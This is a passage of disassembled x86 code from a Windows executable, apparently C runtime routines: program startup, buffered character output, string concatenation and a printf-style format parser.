push [ebp+arg_4]
push [ebp+arg_0]
call sub_4184E8
add esp, 0Ch
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_4185B6
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_418577 endp
; =============== S U B R O U T I N E =======================================
sub_4185B6 proc near ; CODE XREF: sub_418577+31�p
; DATA XREF: .text:stru_42BE80�o
push dword ptr [ebp+8]
call sub_41B0E4
pop ecx
retn
sub_4185B6 endp
; =============== S U B R O U T I N E =======================================
sub_4185C0 proc near ; CODE XREF: sub_41411D+75�p
; sub_41411D+85�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp word ptr [eax], 0
mov edx, eax
jz short loc_4185D4
loc_4185CC: ; CODE XREF: sub_4185C0+12�j
inc edx
inc edx
cmp word ptr [edx], 0
jnz short loc_4185CC
loc_4185D4: ; CODE XREF: sub_4185C0+A�j
push esi
mov esi, [esp+4+arg_4]
loc_4185D9: ; CODE XREF: sub_4185C0+26�j
mov cx, [esi]
mov [edx], cx
inc edx
inc edx
inc esi
inc esi
test cx, cx
jnz short loc_4185D9
pop esi
retn
sub_4185C0 endp
; =============== S U B R O U T I N E =======================================
sub_4185EA proc near ; CODE XREF: .text:00418732�p
; .text:00418758�p ...
arg_0 = dword ptr 4
cmp dword_4811B0, 1
jnz short loc_4185F8
call sub_41DA6E
loc_4185F8: ; CODE XREF: sub_4185EA+7�j
push [esp+arg_0]
call sub_41D8F7
push 0FFh
call off_432360
pop ecx
pop ecx
retn
sub_4185EA endp
; =============== S U B R O U T I N E =======================================
sub_41860F proc near ; CODE XREF: .text:00418708�p
; .text:00418719�p
arg_0 = dword ptr 4
cmp dword_4811B0, 1
jnz short loc_41861D
call sub_41DA6E
loc_41861D: ; CODE XREF: sub_41860F+7�j
push [esp+arg_0]
call sub_41D8F7
push 0FFh
call sub_418239
pop ecx
pop ecx
retn
sub_41860F endp
; ---------------------------------------------------------------------------
push 60h
push offset stru_42BE90
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_416B20
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call dword_422120 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_481164, ecx
mov eax, [esi+4]
mov dword_481170, eax
mov edx, [esi+8]
mov dword_481174, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_481168, esi
cmp ecx, 2
jz short loc_418693
or esi, 8000h
mov dword_481168, esi
loc_418693: ; CODE XREF: .text:00418685�j
shl eax, 8
add eax, edx
mov dword_48116C, eax
xor esi, esi
push esi
mov edi, dword_4220A4
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_4186CE
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_4186CE
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_4186E6
cmp eax, 20Bh
jz short loc_4186D3
loc_4186CE: ; CODE XREF: .text:004186AD�j
; .text:004186BA�j ...
mov [ebp-1Ch], esi
jmp short loc_4186FA
; ---------------------------------------------------------------------------
loc_4186D3: ; CODE XREF: .text:004186CC�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_4186CE
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_4186F4
; ---------------------------------------------------------------------------
loc_4186E6: ; CODE XREF: .text:004186C5�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_4186CE
xor eax, eax
cmp [ecx+0E8h], esi
loc_4186F4: ; CODE XREF: .text:004186E4�j
setnz al
mov [ebp-1Ch], eax
loc_4186FA: ; CODE XREF: .text:004186D1�j
push 1
call sub_419FE3
pop ecx
test eax, eax
jnz short loc_41870E
push 1Ch
call sub_41860F
pop ecx
loc_41870E: ; CODE XREF: .text:00418704�j
call sub_4191D0
test eax, eax
jnz short loc_41871F
push 10h
call sub_41860F
pop ecx
loc_41871F: ; CODE XREF: .text:00418715�j
call sub_41D5EE
mov [ebp-4], esi
call sub_41E06B
test eax, eax
jge short loc_418738
push 1Bh
call sub_4185EA
pop ecx
loc_418738: ; CODE XREF: .text:0041872E�j
call dword_42216C ; GetCommandLineA
mov dword_482968, eax
call sub_41DF49
mov dword_4811A8, eax
call sub_41DEA7
test eax, eax
jge short loc_41875E
push 8
call sub_4185EA
pop ecx
loc_41875E: ; CODE XREF: .text:00418754�j
call sub_41DC74
test eax, eax
jge short loc_41876F
push 9
call sub_4185EA
pop ecx
loc_41876F: ; CODE XREF: .text:00418765�j
call sub_41827B
mov [ebp-20h], eax
cmp eax, esi
jz short loc_418782
push eax
call sub_4185EA
pop ecx
loc_418782: ; CODE XREF: .text:00418779�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call dword_422168 ; GetStartupInfoA
call sub_41DC0B
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_4187A3
movzx eax, word ptr [ebp-34h]
jmp short loc_4187A6
; ---------------------------------------------------------------------------
loc_4187A3: ; CODE XREF: .text:0041879B�j
push 0Ah
pop eax
loc_4187A6: ; CODE XREF: .text:004187A1�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40FAD0
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_4187C4
push edi
call sub_4183B3
loc_4187C4: ; CODE XREF: .text:004187BC�j
call sub_4183D5
jmp short loc_4187F6
; ---------------------------------------------------------------------------
loc_4187CB: ; DATA XREF: .text:stru_42BE90�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_41DAA7
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4187DF: ; DATA XREF: .text:stru_42BE90�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_4187F1
push edi
call sub_4183C4
loc_4187F1: ; CODE XREF: .text:004187E9�j
call sub_4183E4
loc_4187F6: ; CODE XREF: .text:004187C9�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418805 proc near ; CODE XREF: sub_416905+4B�p
; sub_416B5D+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_418911
test al, 40h
jnz loc_418911
test al, 1
jz short loc_41883E
and dword ptr [esi+4], 0
test al, 10h
jz loc_418911
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_41883E: ; CODE XREF: sub_418805+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_41887A
cmp esi, offset dword_432658
jz short loc_418868
cmp esi, offset dword_432678
jnz short loc_418873
loc_418868: ; CODE XREF: sub_418805+59�j
push ebx
call sub_41E4FD
test eax, eax
pop ecx
jnz short loc_41887A
loc_418873: ; CODE XREF: sub_418805+61�j
push esi
call sub_41E4B9
pop ecx
loc_41887A: ; CODE XREF: sub_418805+51�j
; sub_418805+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_4188E7
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_4188A7
push edi
push eax
push ebx
call sub_41E40E
mov [ebp+arg_4], eax
jmp short loc_4188DA
; ---------------------------------------------------------------------------
loc_4188A7: ; CODE XREF: sub_418805+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_4188C5
mov ecx, ebx
sar ecx, 5
mov ecx, dword_4815E0[ecx*4]
mov eax, ebx
and eax, 1Fh
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
jmp short loc_4188CA
; ---------------------------------------------------------------------------
loc_4188C5: ; CODE XREF: sub_418805+A5�j
mov eax, offset dword_432C70
loc_4188CA: ; CODE XREF: sub_418805+BE�j
test byte ptr [eax+4], 20h
jz short loc_4188DD
push 2
push 0
push ebx
call sub_41D6EA
loc_4188DA: ; CODE XREF: sub_418805+A0�j
add esp, 0Ch
loc_4188DD: ; CODE XREF: sub_418805+C9�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_4188FB
; ---------------------------------------------------------------------------
loc_4188E7: ; CODE XREF: sub_418805+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41E40E
add esp, 0Ch
mov [ebp+arg_4], eax
loc_4188FB: ; CODE XREF: sub_418805+E0�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_418907
or dword ptr [esi+0Ch], 20h
jmp short loc_418917
; ---------------------------------------------------------------------------
loc_418907: ; CODE XREF: sub_418805+FA�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_41891A
; ---------------------------------------------------------------------------
loc_418911: ; CODE XREF: sub_418805+10�j
; sub_418805+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_418917: ; CODE XREF: sub_418805+100�j
or eax, 0FFFFFFFFh
loc_41891A: ; CODE XREF: sub_418805+10A�j
pop esi
pop ebx
pop ebp
retn
sub_418805 endp
; =============== S U B R O U T I N E =======================================
sub_41891E proc near ; CODE XREF: sub_418951+11�p
; sub_418975+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_41892A
cmp dword ptr [ecx+8], 0
jz short loc_41894E
loc_41892A: ; CODE XREF: sub_41891E+4�j
dec dword ptr [ecx+4]
js short loc_41893A
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_418946
; ---------------------------------------------------------------------------
loc_41893A: ; CODE XREF: sub_41891E+F�j
movsx eax, al
push ecx
push eax
call sub_418805
pop ecx
pop ecx
loc_418946: ; CODE XREF: sub_41891E+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_41894E
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_41894E: ; CODE XREF: sub_41891E+A�j
; sub_41891E+2B�j
inc dword ptr [esi]
retn
sub_41891E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418951 proc near ; CODE XREF: sub_4189AC+6A2�p
; sub_4189AC+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_41896C
; ---------------------------------------------------------------------------
loc_418959: ; CODE XREF: sub_418951+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_41891E
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_418972
loc_41896C: ; CODE XREF: sub_418951+6�j
cmp [ebp+arg_4], 0
jg short loc_418959
loc_418972: ; CODE XREF: sub_418951+19�j
pop esi
pop ebp
retn
sub_418951 endp
; =============== S U B R O U T I N E =======================================
sub_418975 proc near ; CODE XREF: sub_4189AC+6B6�p
; sub_4189AC+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_4189A2
cmp dword ptr [edi+8], 0
jnz short loc_4189A2
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_4189A9
; ---------------------------------------------------------------------------
loc_41898F: ; CODE XREF: sub_418975+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_41891E
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4189A9
loc_4189A2: ; CODE XREF: sub_418975+A�j
; sub_418975+10�j
cmp [esp+8+arg_0], 0
jg short loc_41898F
loc_4189A9: ; CODE XREF: sub_418975+18�j
; sub_418975+2B�j
pop esi
pop ebx
retn
sub_418975 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4189AC proc near ; CODE XREF: sub_416905+2A�p
; sub_416B5D+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_432A48
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_419110
push esi
push edi
mov edi, eax
jmp short loc_4189E4
; ---------------------------------------------------------------------------
loc_4189E1: ; CODE XREF: sub_4189AC+75C�j
mov ecx, [ebp+var_38]
loc_4189E4: ; CODE XREF: sub_4189AC+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_41910E
cmp bl, 20h
jl short loc_418A0B
cmp bl, 78h
jg short loc_418A0B
movsx eax, bl
movsx eax, byte ptr stru_42BE80._unk[eax]
and eax, 0Fh
jmp short loc_418A0D
; ---------------------------------------------------------------------------
loc_418A0B: ; CODE XREF: sub_4189AC+49�j
; sub_4189AC+4E�j
xor eax, eax
loc_418A0D: ; CODE XREF: sub_4189AC+5D�j
movsx eax, byte_42BEA0[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_419101 ; default
jmp off_419121[eax*4] ; switch jump
loc_418A2D: ; DATA XREF: .text:off_419121�o
xor eax, eax ; jumptable 00418A26 case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A4A: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
movsx eax, bl ; jumptable 00418A26 case 2
sub eax, 20h
jz short loc_418A8D
sub eax, 3
jz short loc_418A84
sub eax, 8
jz short loc_418A7B
dec eax
dec eax
jz short loc_418A72
sub eax, 3
jnz loc_419101 ; default
or [ebp+var_8], 8
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A72: ; CODE XREF: sub_4189AC+B2�j
or [ebp+var_8], 4
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A7B: ; CODE XREF: sub_4189AC+AE�j
or [ebp+var_8], 1
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A84: ; CODE XREF: sub_4189AC+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A8D: ; CODE XREF: sub_4189AC+A4�j
or [ebp+var_8], 2
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418A96: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
cmp bl, 2Ah ; jumptable 00418A26 case 3
jnz short loc_418ABC
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_419101 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418ABC: ; CODE XREF: sub_4189AC+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418AD1: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
and [ebp+var_C], 0 ; jumptable 00418A26 case 4
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418ADA: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
cmp bl, 2Ah ; jumptable 00418A26 case 5
jnz short loc_418AFD
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_419101 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418AFD: ; CODE XREF: sub_4189AC+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B12: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
cmp bl, 49h ; jumptable 00418A26 case 6
jz short loc_418B45
cmp bl, 68h
jz short loc_418B3C
cmp bl, 6Ch
jz short loc_418B33
cmp bl, 77h
jnz loc_419101 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B33: ; CODE XREF: sub_4189AC+173�j
or [ebp+var_8], 10h
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B3C: ; CODE XREF: sub_4189AC+16E�j
or [ebp+var_8], 20h
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B45: ; CODE XREF: sub_4189AC+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_418B5F
cmp byte ptr [edi+1], 34h
jnz short loc_418B5F
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
mov [ebp+arg_4], edi
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B5F: ; CODE XREF: sub_4189AC+19D�j
; sub_4189AC+1A3�j
cmp al, 33h
jnz short loc_418B77
cmp byte ptr [edi+1], 32h
jnz short loc_418B77
inc edi
inc edi
and byte ptr [ebp+var_8+1], 7Fh
mov [ebp+arg_4], edi
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418B77: ; CODE XREF: sub_4189AC+1B5�j
; sub_4189AC+1BB�j
cmp al, 64h
jz loc_419101 ; default
cmp al, 69h
jz loc_419101 ; default
cmp al, 6Fh
jz loc_419101 ; default
cmp al, 75h
jz loc_419101 ; default
cmp al, 78h
jz loc_419101 ; default
cmp al, 58h
jz loc_419101 ; default
and [ebp+var_38], 0
loc_418BAB: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
mov ecx, off_432A40 ; jumptable 00418A26 case 0
and [ebp+var_28], 0
movzx eax, bl
test byte ptr [ecx+eax*2+1], 80h
jz short loc_418BD2
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_41891E
mov bl, [edi]
inc edi
mov [ebp+arg_4], edi
loc_418BD2: ; CODE XREF: sub_4189AC+211�j
mov ecx, [ebp+arg_0]
lea esi, [ebp+var_18]
mov al, bl
call sub_41891E
jmp loc_419101 ; default
; ---------------------------------------------------------------------------
loc_418BE4: ; CODE XREF: sub_4189AC+7A�j
; DATA XREF: .text:off_419121�o
movsx eax, bl ; jumptable 00418A26 case 7
cmp eax, 67h
jg loc_418E36
cmp eax, 65h
jge loc_418C79
cmp eax, 58h
jg loc_418CDA
jz loc_418EB7
sub eax, 43h
jz loc_418C9C
dec eax
dec eax
jz short loc_418C6F
dec eax
dec eax
jz short loc_418C6F
sub eax, 0Ch
jnz loc_418FFF
test word ptr [ebp+var_8], 830h
jnz short loc_418C2E
or byte ptr [ebp+var_8+1], 8
loc_418C2E: ; CODE XREF: sub_4189AC+27C�j
; sub_4189AC+4A9�j
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_418C3B
mov ecx, 7FFFFFFFh
loc_418C3B: ; CODE XREF: sub_4189AC+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_418E8C
test eax, eax
jnz short loc_418C60
mov eax, off_43236C
mov [ebp+var_10], eax
loc_418C60: ; CODE XREF: sub_4189AC+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_418E7E
; ---------------------------------------------------------------------------
loc_418C6F: ; CODE XREF: sub_4189AC+267�j
; sub_4189AC+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_418C79: ; CODE XREF: sub_4189AC+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_418D80
mov [ebp+var_C], 6
jmp loc_418DC7
; ---------------------------------------------------------------------------
loc_418C9C: ; CODE XREF: sub_4189AC+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_418CA8
or byte ptr [ebp+var_8+1], 8
loc_418CA8: ; CODE XREF: sub_4189AC+2F6�j
; sub_4189AC+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_418D19
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41E587
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_418D29
mov [ebp+var_34], 1
jmp short loc_418D29
; ---------------------------------------------------------------------------
loc_418CDA: ; CODE XREF: sub_4189AC+250�j
sub eax, 5Ah
jz short loc_418D37
sub eax, 9
jz short loc_418CA8
dec eax
jnz loc_418FFF
loc_418CEB: ; CODE XREF: sub_4189AC+48D�j
or [ebp+var_8], 40h
loc_418CEF: ; CODE XREF: sub_4189AC+4B1�j
mov [ebp+var_14], 0Ah
loc_418CF6: ; CODE XREF: sub_4189AC+519�j
; sub_4189AC+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_418F27
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_418F4F
; ---------------------------------------------------------------------------
loc_418D19: ; CODE XREF: sub_4189AC+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_418D29: ; CODE XREF: sub_4189AC+323�j
; sub_4189AC+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_418FFF
; ---------------------------------------------------------------------------
loc_418D37: ; CODE XREF: sub_4189AC+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_418D72
mov ecx, [eax+4]
test ecx, ecx
jz short loc_418D72
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_418D69
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_418FFC
; ---------------------------------------------------------------------------
loc_418D69: ; CODE XREF: sub_4189AC+3AA�j
and [ebp+var_28], 0
jmp loc_418FFC
; ---------------------------------------------------------------------------
loc_418D72: ; CODE XREF: sub_4189AC+397�j
; sub_4189AC+39E�j
mov eax, off_432368
mov [ebp+var_10], eax
push eax
jmp loc_418E2B
; ---------------------------------------------------------------------------
loc_418D80: ; CODE XREF: sub_4189AC+2DE�j
jnz short loc_418D90
cmp bl, 67h
jnz short loc_418DC7
mov [ebp+var_C], 1
jmp short loc_418DC7
; ---------------------------------------------------------------------------
loc_418D90: ; CODE XREF: sub_4189AC:loc_418D80�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_418D9D
mov [ebp+var_C], eax
loc_418D9D: ; CODE XREF: sub_4189AC+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_418DC7
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_416DAF
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_418DC4
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_418DC7
; ---------------------------------------------------------------------------
loc_418DC4: ; CODE XREF: sub_4189AC+40F�j
mov [ebp+var_C], edi
loc_418DC7: ; CODE XREF: sub_4189AC+2EB�j
; sub_4189AC+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_432A28
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_418E0C
cmp [ebp+var_C], 0
jnz short loc_418E0C
push esi
call off_432A34
pop ecx
loc_418E0C: ; CODE XREF: sub_4189AC+450�j
; sub_4189AC+456�j
cmp bl, 67h
jnz short loc_418E1D
test edi, edi
jnz short loc_418E1D
push esi
call off_432A2C
pop ecx
loc_418E1D: ; CODE XREF: sub_4189AC+463�j
; sub_4189AC+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_418E2A
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_418E2A: ; CODE XREF: sub_4189AC+474�j
push esi
loc_418E2B: ; CODE XREF: sub_4189AC+3CF�j
call sub_419D00
pop ecx
jmp loc_418FFC
; ---------------------------------------------------------------------------
loc_418E36: ; CODE XREF: sub_4189AC+23E�j
sub eax, 69h
jz loc_418CEB
sub eax, 5
jz loc_418EFD
dec eax
jz loc_418EE3
dec eax
jz short loc_418EB0
sub eax, 3
jz loc_418C2E
dec eax
dec eax
jz loc_418CEF
sub eax, 3
jnz loc_418FFF
mov [ebp+var_30], 27h
jmp short loc_418EBA
; ---------------------------------------------------------------------------
loc_418E75: ; CODE XREF: sub_4189AC+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_418E82
inc eax
inc eax
loc_418E7E: ; CODE XREF: sub_4189AC+2BE�j
test ecx, ecx
jnz short loc_418E75
loc_418E82: ; CODE XREF: sub_4189AC+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_418FFC
; ---------------------------------------------------------------------------
loc_418E8C: ; CODE XREF: sub_4189AC+2A2�j
test eax, eax
jnz short loc_418E98
mov eax, off_432368
mov [ebp+var_10], eax
loc_418E98: ; CODE XREF: sub_4189AC+4E2�j
mov eax, [ebp+var_10]
jmp short loc_418EA4
; ---------------------------------------------------------------------------
loc_418E9D: ; CODE XREF: sub_4189AC+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_418EA8
inc eax
loc_418EA4: ; CODE XREF: sub_4189AC+4EF�j
test ecx, ecx
jnz short loc_418E9D
loc_418EA8: ; CODE XREF: sub_4189AC+4F5�j
sub eax, [ebp+var_10]
jmp loc_418FFC
; ---------------------------------------------------------------------------
loc_418EB0: ; CODE XREF: sub_4189AC+4A4�j
mov [ebp+var_C], 8
loc_418EB7: ; CODE XREF: sub_4189AC+256�j
mov [ebp+var_30], ecx
loc_418EBA: ; CODE XREF: sub_4189AC+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_418CF6
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_418CF6
; ---------------------------------------------------------------------------
loc_418EE3: ; CODE XREF: sub_4189AC+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_418CF6
or byte ptr [ebp+var_8+1], 2
jmp loc_418CF6
; ---------------------------------------------------------------------------
loc_418EFD: ; CODE XREF: sub_4189AC+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_418F16
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_418F1B
; ---------------------------------------------------------------------------
loc_418F16: ; CODE XREF: sub_4189AC+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_418F1B: ; CODE XREF: sub_4189AC+568�j
mov [ebp+var_34], 1
jmp loc_4190EE
; ---------------------------------------------------------------------------
loc_418F27: ; CODE XREF: sub_4189AC+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_418F45
test bl, 40h
jz short loc_418F3F
movsx eax, word ptr [eax-4]
loc_418F3C: ; CODE XREF: sub_4189AC+597�j
; sub_4189AC+59F�j
cdq
jmp short loc_418F4F
; ---------------------------------------------------------------------------
loc_418F3F: ; CODE XREF: sub_4189AC+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_418F3C
; ---------------------------------------------------------------------------
loc_418F45: ; CODE XREF: sub_4189AC+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_418F3C
xor edx, edx
loc_418F4F: ; CODE XREF: sub_4189AC+368�j
; sub_4189AC+591�j
test bl, 40h
jz short loc_418F69
test edx, edx
jg short loc_418F69
jl short loc_418F5E
test eax, eax
jnb short loc_418F69
loc_418F5E: ; CODE XREF: sub_4189AC+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_418F69: ; CODE XREF: sub_4189AC+5A6�j
; sub_4189AC+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_418F74
xor edi, edi
